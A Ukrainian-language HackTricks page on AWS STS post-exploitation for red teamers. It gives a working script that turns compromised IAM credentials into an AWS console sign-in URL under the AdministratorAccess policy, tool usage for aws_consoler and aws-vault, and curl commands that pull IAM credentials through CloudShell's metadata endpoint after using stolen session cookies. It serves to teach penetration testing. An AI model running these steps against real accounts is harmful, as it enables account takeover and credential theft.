AWS - STS Post Exploitation

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

STS

Для отримання додаткової інформації:

pageAWS - IAM Enum

Від IAM-кредитів до консолі

Якщо вам вдалося отримати деякі IAM-кредити, вас може зацікавити доступ до веб-консолі за допомогою наступних інструментів. Зверніть увагу, що користувач/роль повинен мати дозвіл sts:GetFederationToken.

Власний скрипт

Наступний скрипт буде використовувати профіль за замовчуванням та місцезнаходження AWS за замовчуванням (не gov та не cn), щоб надати вам підписаний URL, який ви можете використовувати для входу в веб-консоль:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)



# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Ви можете створити посилання на веб-консоль за допомогою https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Переконайтеся, що користувач IAM має дозвіл sts:GetFederationToken, або надайте роль для припущення.

aws-vault

aws-vault - це інструмент для безпечного зберігання та доступу до облікових даних AWS в середовищі розробки.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Ви також можете використовувати aws-vault для отримання сесії консолі браузера

Від консолі до облікових даних IAM

Оригінально виявлено в цьому пості, Якщо вам вдалося скомпрометувати доступ до веб-консолі (можливо, ви вкрали файли cookie і не могли отримати доступ до папки .aws), ви можете отримати деякі облікові дані токенів IAM для цього користувача через CloudShell.

CloudShell викладає облікові дані IAM через недокументовану точку доступу на порту 1338. Після завантаження сесійних файлів cookie з жертви у свій браузер, ви можете перейти до CloudShell та виконати наступні команди, щоб отримати облікові дані IAM.

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated